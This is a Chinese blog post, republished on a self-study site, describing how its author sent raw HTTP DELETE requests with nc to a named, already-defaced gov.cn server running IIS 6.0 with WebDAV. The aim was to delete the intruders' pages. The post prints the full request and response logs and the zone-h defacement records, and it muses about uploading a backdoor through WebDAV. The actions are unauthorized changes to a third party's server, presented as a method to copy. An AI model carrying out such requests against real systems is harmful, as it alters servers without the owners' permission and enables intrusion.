好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

使用HTTP的DELETE方法删除黑页 - 网站安全 - 自学

文章作者:Nana

今天小驹在群里发了一个网址,原来是一个gov.cn的网站被外国 黑客 黑了,看了下,应该是WebDAV的问题。不过让我很上火。

自己拿HTTP的perl脚本扫了下,似乎服务器除了WebDAV,还支持DELETE传输。DELETE一般不会开启的,而且DELETE,用put脚本试了下,只支持delete不支持put

注*关于WebDAV的安全问题可见网上:远程服务器当前运行WebDAV服务,WebDAV 服务是HTTP规范的一个扩展的标准。它让远程用户对服务器添加授权的用户和管理添加服务器的内容。

关于put的应用具体看这里:

危险的传输协议致黑客站点被入侵

delete类似,明白了HTTP传输的原理,操作起来就简单多了。虽然put不开,但是用delete协议删黑页和后门是绰绰有余的。然事儿后再YY一下自己用webdav传个后门上去

删除后门方法,最简单的用nc军刀连接后,发送指令(粗体是发送的):

[2010-07-25 23:14:48.914] 发送指令:HEAD ? HTTP/1.0 Host: HdhCmsTesthunanmw.gov.cn Accept: */* Referer: http:// [2010-07-25 23:15:47.815] 发送指令:DELETE /indonesia.htm HTTP/1.0 Accept-Language: en-us;q=0.5 Translate: f Content-Length:26 User-Agent: Silic Group(blackbap.org) Host:HdhCmsTesthunanmw.gov.cn

Host: HdhCmsTesthunanmw.gov.cn Accept: */* Referer: http://HdhCmsTesthunanmw.gov.cn/ User-Agent: blackbap.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: close Date: Sun, 25 Jul 2010 15:13:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET

再打开,黑页就没了

为了证明真实性,再截图一个黑页吧。上去才看见上面n多后门,黑页。。。无语。。。

这是zone-h查询的:

Results for "HdhCmsTesthunanmw.gov.cn" (10 results per section):

NEWS:

EVENTS:

DEFACEMENTS: http://HdhCmsTesthunanmw.gov.cn/indonesia.txt defaced by Hmei7 http://HdhCmsTesthunanmw.gov.cn/derf.txt defaced by kernel_attack

Click here if you wish to make a fulltext domain search for this keyword in the defacement

 

就这么个样子。。。

===============================

上面截图了,今天来第二个

[2010-07-26 19:46:44.062] 127.0.0.1:49912 成功连接到 HdhCmsTesthunanmw.gov.cn:80

[2010-07-26 19:46:56.092] 发送指令:HEAD / HTTP/1.0 Host: HdhCmsTesthunanmw.gov.cn Accept: */* Referer: http://HdhCmsTesthunanmw.gov.cn/ User-Agent: silic group Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Mon, 26 Jul 2010 11:44:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 70266 Content-Type: text/ html Set-Cookie: ASPSESSIONIDSCSBSCQT=MCPPADJCALJBHJIIGNFNOHMJ; path=/ Cache-control: private

[2010-07-26 19:47:19.222] 发送指令:delete [2010-07-26 19:48:13.533] 发送指令:DELETE /indonesia.txt HTTP/1.0 Host: HdhCmsTesthunanmw.gov.cn Accept: */* Referer: http://HdhCmsTesthunanmw.gov.cn/ User-Agent: silic group Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Mon, 26 Jul 2010 11:46:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 0

Host: HdhCmsTesthunanmw.gov.cn Accept: */* Referer: http://HdhCmsTesthunanmw.gov.cn/ User-Agent: silic group

绿色是发送的,黑色的是回显的

再看看,这个页也没了~

查看更多关于使用HTTP的DELETE方法删除黑页 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11170
  阅读:59次

上一篇: 8一8最近的Kernet x86_64的32位支持的2个漏洞 - 网站

下一篇:Exponent CMS v0.97 Multiple Vulnerabilities - 网站安全

相关资讯